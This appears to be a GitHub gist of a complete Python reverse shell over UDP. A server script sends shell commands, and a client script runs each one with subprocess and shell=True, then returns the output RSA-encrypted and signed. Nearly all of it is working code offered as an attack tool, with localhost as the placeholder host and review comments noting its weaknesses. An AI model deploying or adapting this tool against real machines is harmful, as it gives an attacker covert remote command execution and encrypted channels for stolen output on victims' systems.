Created
February 1, 2024 16:23
-
-
Save 0x07CB/616279732a5757c1c69251275ab616d7 to your computer and use it in GitHub Desktop.
Reverse Shell over UDP with RSA encryption
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pyasn1==0.5.1
rsa==4.9
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
import rsa | |
import socket | |
class UDP_Server:
    """Thin wrapper around an IPv4 UDP socket for the listening side.

    ``close``, ``send_data`` and ``bind`` return ``self`` so calls can be
    chained.  The object also works as a context manager so the socket is
    released even when the caller exits through an exception.
    """

    def __init__(self, host, port):
        """Create the datagram socket; nothing is bound until ``bind()``.

        Args:
            host: Local address used by ``bind()``.
            port: Local UDP port used by ``bind()``.
        """
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def __enter__(self):
        """Return the wrapper itself for use in a ``with`` statement."""
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Close the socket on leaving the ``with`` block.

        Returns ``False`` so an exception raised inside the block propagates.
        """
        self.close()
        return False

    def close(self):
        """Close the underlying socket and return ``self``."""
        self.sock.close()
        return self

    def send_data(self, data, address):
        """Send one datagram.

        Args:
            data: Payload handed to ``socket.sendto``.
            address: ``(host, port)`` destination.

        Returns:
            ``self``, to allow chaining.
        """
        self.sock.sendto(data, address)
        return self

    def recv_data(self, size):
        """Block until a datagram arrives.

        Args:
            size: Buffer size passed to ``socket.recvfrom``.

        Returns:
            The ``(data, address)`` pair returned by ``socket.recvfrom``.
        """
        return self.sock.recvfrom(size)

    def bind(self):
        """Bind the socket to ``(self.host, self.port)`` and return ``self``."""
        self.sock.bind((self.host, self.port))
        return self
class RSA_Communication:
    """Own an RSA key pair and encrypt/decrypt single messages with it."""

    def __init__(self, key_size=4096):
        """Generate a fresh key pair.

        Args:
            key_size: Key size in bits, passed to ``rsa.newkeys``.
        """
        self.pubkey, self.privkey = rsa.newkeys(key_size)

    @staticmethod
    def _as_bytes(data):
        """Normalise *data* to ``bytes``.

        Bytes-like objects are copied into ``bytes``; anything else is
        UTF-8 encoded through its ``encode`` method, exactly as before.
        An exact-type comparison would send ``bytearray``/``memoryview``
        down the ``encode`` path, where they fail with AttributeError.
        """
        if isinstance(data, (bytes, bytearray, memoryview)):
            return bytes(data)
        return data.encode('utf-8')

    def get_pubkey_PEM(self):
        """Return the current public key serialised as PKCS#1 PEM."""
        return self.pubkey.save_pkcs1('PEM')

    def get_privkey_PEM(self):
        """Return the current private key serialised as PKCS#1 PEM."""
        return self.privkey.save_pkcs1('PEM')

    def load_pubkey_PEM(self, keydata):
        """Replace the public key with the one parsed from *keydata*.

        Returns:
            ``self``, to allow chaining.
        """
        self.pubkey = rsa.PublicKey.load_pkcs1(keydata)
        return self

    def load_privkey_PEM(self, keydata):
        """Replace the private key with the one parsed from *keydata*.

        Returns:
            ``self``, to allow chaining.
        """
        self.privkey = rsa.PrivateKey.load_pkcs1(keydata)
        return self

    def encrypt(self, data):
        """Encrypt *data* (``str`` or bytes-like) with the stored public key.

        NOTE(review): per the Python-RSA docs the message must fit in a
        single RSA block (key size in bytes minus 11); longer input raises
        in ``rsa.encrypt``.
        """
        return rsa.encrypt(self._as_bytes(data), self.pubkey)

    def decrypt(self, data):
        """Decrypt *data* with the stored private key and return the bytes."""
        return rsa.decrypt(self._as_bytes(data), self.privkey)
class RSA_Signature:
    """Sign and verify messages with PEM-encoded RSA keys."""

    def __init__(self, hash_method='SHA-1', key_size=4096):
        """Remember the signing parameters.

        Args:
            hash_method: Hash name handed to ``rsa.sign`` and expected back
                from ``rsa.verify``.
                NOTE(review): SHA-1 is a weak default for signatures; it is
                kept only so existing callers and peers stay compatible.
            key_size: Stored on the instance; no method of this class
                reads it.
        """
        self.hash_method = hash_method
        self.key_size = key_size

    @staticmethod
    def _as_bytes(data):
        """Normalise *data* to ``bytes``.

        Bytes-like objects are copied into ``bytes``; anything else is
        UTF-8 encoded through its ``encode`` method, exactly as before.
        """
        if isinstance(data, (bytes, bytearray, memoryview)):
            return bytes(data)
        return data.encode('utf-8')

    def sign(self, data, privkey):
        """Sign *data* with the PEM-encoded private key *privkey*.

        Returns:
            The signature bytes produced by ``rsa.sign``.
        """
        private_key = rsa.PrivateKey.load_pkcs1(privkey)
        return rsa.sign(self._as_bytes(data), private_key, self.hash_method)

    def verify(self, data, signature, pubkey):
        """Verify *signature* over *data* with the PEM public key *pubkey*.

        Returns:
            Whatever ``rsa.verify`` returns (the name of the hash that was
            used, according to the Python-RSA 4.x documentation).

        Raises:
            rsa.pkcs1.VerificationError: If the signature does not match.
        """
        public_key = rsa.PublicKey.load_pkcs1(pubkey)
        return rsa.verify(self._as_bytes(data), signature, public_key)

    def check_signature(self, data, signature, pubkey):
        """Return ``True`` only for a valid signature made with ``hash_method``.

        A failed verification is reported as ``False`` instead of raising.
        """
        try:
            used_hash = self.verify(data, signature, pubkey)
        except rsa.pkcs1.VerificationError:
            return False
        # A valid signature made with a different hash is still rejected.
        return used_hash == self.hash_method
def main():
    """Run the interactive server side of the exchange.

    Flow: bind the UDP socket, receive the peer's PEM public key in the
    first datagram, answer with our own public key, then loop.  Each round
    reads a command from the prompt and sends it encrypted plus its
    signature.  It then expects four datagrams back (encrypted stdout, its
    signature, encrypted stderr, its signature) and prints the output only
    if they all come from the peer and both signatures verify.  A command
    containing ``terminate`` ends the loop after it has been sent.

    NOTE(review): the peer's key is accepted from whoever sends the first
    datagram; nothing authenticates it.
    NOTE(review): every payload is a single RSA block read with a 1024-byte
    buffer, so ``rsa.encrypt`` raises on commands longer than the block
    limit (key size in bytes minus 11, per the Python-RSA docs).
    """
    rejected_message = "Réponse rejetée: origine, chiffrement ou signature invalide."
    server = UDP_Server("127.0.0.1", 12345)
    try:
        server.bind()
        rsa_comm = RSA_Communication()
        pubkey = rsa_comm.get_pubkey_PEM()
        # Loop invariants: serialise our private key and build the signer once.
        privkey_pem = rsa_comm.get_privkey_PEM()
        auth_sign = RSA_Signature('SHA-1', 4096)

        print("Serveur en attente de connexion...")
        client_pubkey, client_address = server.recv_data(1024)
        print("Tentative de connexion entrante de: ", client_address)
        print("Clé publique du client reçue.")
        # Parse the peer key once; a malformed key now fails before the loop.
        client_key = rsa.PublicKey.load_pkcs1(client_pubkey)
        print("Connexion établie avec le client: ", client_address)
        server.send_data(pubkey, client_address)

        while True:
            shell_command = input("shell>> ")
            terminate = 'terminate' in shell_command
            shell_command = shell_command.encode('utf-8')
            shell_command_signature = auth_sign.sign(shell_command, privkey_pem)
            server.send_data(rsa.encrypt(shell_command, client_key), client_address)
            server.send_data(shell_command_signature, client_address)
            if terminate:
                break

            # Order on the wire: stdout, sig(stdout), stderr, sig(stderr).
            replies = [server.recv_data(1024) for _ in range(4)]
            # Every datagram must come from the peer that did the handshake.
            # The old check only compared the last two senders to each other.
            if any(sender != client_address for _, sender in replies):
                print(rejected_message)
                continue
            crypt_stdout, sig_stdout, crypt_stderr, sig_stderr = (
                payload for payload, _ in replies
            )
            try:
                shell_stdout = rsa_comm.decrypt(crypt_stdout)
                shell_stderr = rsa_comm.decrypt(crypt_stderr)
            except rsa.pkcs1.DecryptionError:
                print(rejected_message)
                continue
            if (auth_sign.check_signature(shell_stdout, sig_stdout, client_pubkey)
                    and auth_sign.check_signature(shell_stderr, sig_stderr, client_pubkey)):
                # Command output is arbitrary bytes; do not crash on non-UTF-8.
                print(shell_stdout.decode(errors='replace'))
                print(shell_stderr.decode(errors='replace'))
            else:
                print(rejected_message)
    finally:
        # Release the socket on normal exit, Ctrl-C or any error.
        server.close()


if __name__ == "__main__":
    main()
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
import rsa | |
import socket | |
import subprocess | |
class UDP_Client:
    """Thin wrapper around an unbound IPv4 UDP socket.

    ``close`` and ``send_data`` return ``self`` so calls can be chained.
    The object also works as a context manager so the socket is released
    even when the caller exits through an exception.
    """

    def __init__(self, host, port):
        """Create the datagram socket.

        Args:
            host: Stored on the instance; ``send_data`` takes its own
                destination and does not read it.
            port: Stored on the instance; not read by any method here.
        """
        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def __enter__(self):
        """Return the wrapper itself for use in a ``with`` statement."""
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Close the socket on leaving the ``with`` block.

        Returns ``False`` so an exception raised inside the block propagates.
        """
        self.close()
        return False

    def close(self):
        """Close the underlying socket and return ``self``."""
        self.sock.close()
        return self

    def send_data(self, data, address):
        """Send one datagram.

        Args:
            data: Payload handed to ``socket.sendto``.
            address: ``(host, port)`` destination.

        Returns:
            ``self``, to allow chaining.
        """
        self.sock.sendto(data, address)
        return self

    def recv_data(self, size):
        """Block until a datagram arrives.

        Args:
            size: Buffer size passed to ``socket.recvfrom``.

        Returns:
            The ``(data, address)`` pair returned by ``socket.recvfrom``.
        """
        return self.sock.recvfrom(size)
class RSA_Communication:
    """Own an RSA key pair and encrypt/decrypt single messages with it."""

    def __init__(self, key_size=4096):
        """Generate a fresh key pair.

        Args:
            key_size: Key size in bits, passed to ``rsa.newkeys``.
        """
        self.pubkey, self.privkey = rsa.newkeys(key_size)

    @staticmethod
    def _as_bytes(data):
        """Normalise *data* to ``bytes``.

        Bytes-like objects are copied into ``bytes``; anything else is
        UTF-8 encoded through its ``encode`` method, exactly as before.
        An exact-type comparison would send ``bytearray``/``memoryview``
        down the ``encode`` path, where they fail with AttributeError.
        """
        if isinstance(data, (bytes, bytearray, memoryview)):
            return bytes(data)
        return data.encode('utf-8')

    def get_pubkey_PEM(self):
        """Return the current public key serialised as PKCS#1 PEM."""
        return self.pubkey.save_pkcs1('PEM')

    def get_privkey_PEM(self):
        """Return the current private key serialised as PKCS#1 PEM."""
        return self.privkey.save_pkcs1('PEM')

    def load_pubkey_PEM(self, keydata):
        """Replace the public key with the one parsed from *keydata*.

        Returns:
            ``self``, to allow chaining.
        """
        self.pubkey = rsa.PublicKey.load_pkcs1(keydata)
        return self

    def load_privkey_PEM(self, keydata):
        """Replace the private key with the one parsed from *keydata*.

        Returns:
            ``self``, to allow chaining.
        """
        self.privkey = rsa.PrivateKey.load_pkcs1(keydata)
        return self

    def encrypt(self, data):
        """Encrypt *data* (``str`` or bytes-like) with the stored public key.

        NOTE(review): per the Python-RSA docs the message must fit in a
        single RSA block (key size in bytes minus 11); longer input raises
        in ``rsa.encrypt``.
        """
        return rsa.encrypt(self._as_bytes(data), self.pubkey)

    def decrypt(self, data):
        """Decrypt *data* with the stored private key and return the bytes."""
        return rsa.decrypt(self._as_bytes(data), self.privkey)
class RSA_Signature:
    """Sign and verify messages with PEM-encoded RSA keys."""

    def __init__(self, hash_method='SHA-1', key_size=4096):
        """Remember the signing parameters.

        Args:
            hash_method: Hash name handed to ``rsa.sign`` and expected back
                from ``rsa.verify``.
                NOTE(review): SHA-1 is a weak default for signatures; it is
                kept only so existing callers and peers stay compatible.
            key_size: Stored on the instance; no method of this class
                reads it.
        """
        self.hash_method = hash_method
        self.key_size = key_size

    @staticmethod
    def _as_bytes(data):
        """Normalise *data* to ``bytes``.

        Bytes-like objects are copied into ``bytes``; anything else is
        UTF-8 encoded through its ``encode`` method, exactly as before.
        """
        if isinstance(data, (bytes, bytearray, memoryview)):
            return bytes(data)
        return data.encode('utf-8')

    def sign(self, data, privkey):
        """Sign *data* with the PEM-encoded private key *privkey*.

        Returns:
            The signature bytes produced by ``rsa.sign``.
        """
        private_key = rsa.PrivateKey.load_pkcs1(privkey)
        return rsa.sign(self._as_bytes(data), private_key, self.hash_method)

    def verify(self, data, signature, pubkey):
        """Verify *signature* over *data* with the PEM public key *pubkey*.

        Returns:
            Whatever ``rsa.verify`` returns (the name of the hash that was
            used, according to the Python-RSA 4.x documentation).

        Raises:
            rsa.pkcs1.VerificationError: If the signature does not match.
        """
        public_key = rsa.PublicKey.load_pkcs1(pubkey)
        return rsa.verify(self._as_bytes(data), signature, public_key)

    def check_signature(self, data, signature, pubkey):
        """Return ``True`` only for a valid signature made with ``hash_method``.

        A failed verification is reported as ``False`` instead of raising.
        """
        try:
            used_hash = self.verify(data, signature, pubkey)
        except rsa.pkcs1.VerificationError:
            return False
        # A valid signature made with a different hash is still rejected.
        return used_hash == self.hash_method
def main():
    """Run the client side of the exchange.

    Flow: generate a key pair, send the PEM public key to 127.0.0.1:12345,
    receive the server's public key, then loop.  Each round receives an
    encrypted command and its signature.  If both datagrams come from the
    same address and the signature verifies against the server key, the
    command is run through the shell; stdout and stderr are each sent back
    encrypted and followed by their signature.  A verified command
    containing ``terminate`` ends the loop.

    WARNING: this executes whatever command string arrives, with
    ``shell=True``.  The only gate is the signature check, and the server
    key it checks against is accepted unauthenticated from the first reply.
    NOTE(review): each output is encrypted as a single RSA block, so
    ``rsa.encrypt`` raises on output longer than the block limit (key size
    in bytes minus 11, per the Python-RSA docs).
    """
    rsa_comm = RSA_Communication()
    pubkey = rsa_comm.get_pubkey_PEM()
    # Loop invariants: serialise our private key and build the signer once.
    privkey_pem = rsa_comm.get_privkey_PEM()
    auth_sign = RSA_Signature('SHA-1', 4096)
    client = UDP_Client("127.0.0.1", 12345)
    try:
        client.send_data(pubkey, ("127.0.0.1", 12345))
        server_pubkey, server_address = client.recv_data(1024)
        # Parse the server key once instead of twice per command.
        server_key = rsa.PublicKey.load_pkcs1(server_pubkey, 'PEM')

        while True:
            encrypted_command, server_address = client.recv_data(1024)
            command = rsa_comm.decrypt(encrypted_command).decode('utf-8')
            signature_command, server_address_ = client.recv_data(1024)
            if server_address_ != server_address:
                continue
            if not auth_sign.check_signature(command, signature_command, server_pubkey):
                continue
            if 'terminate' in command:
                break

            process = subprocess.Popen(
                command,
                shell=True,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                stdin=subprocess.PIPE,
            )
            # communicate() drains both pipes concurrently, closes stdin and
            # reaps the child.  Reading stdout to EOF before touching stderr
            # can deadlock once the child fills the stderr pipe.
            clear_stdout, clear_stderr = process.communicate()

            outputs = (clear_stdout, clear_stderr)
            # Encrypt both before sending so an oversize output aborts the
            # round before any datagram has gone out, as it did originally.
            encrypted_outputs = [rsa.encrypt(output, server_key) for output in outputs]
            for output, encrypted_output in zip(outputs, encrypted_outputs):
                client.send_data(encrypted_output, server_address)
                client.send_data(auth_sign.sign(output, privkey_pem), server_address)
    finally:
        # Release the socket on normal exit or any error.
        client.close()


if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment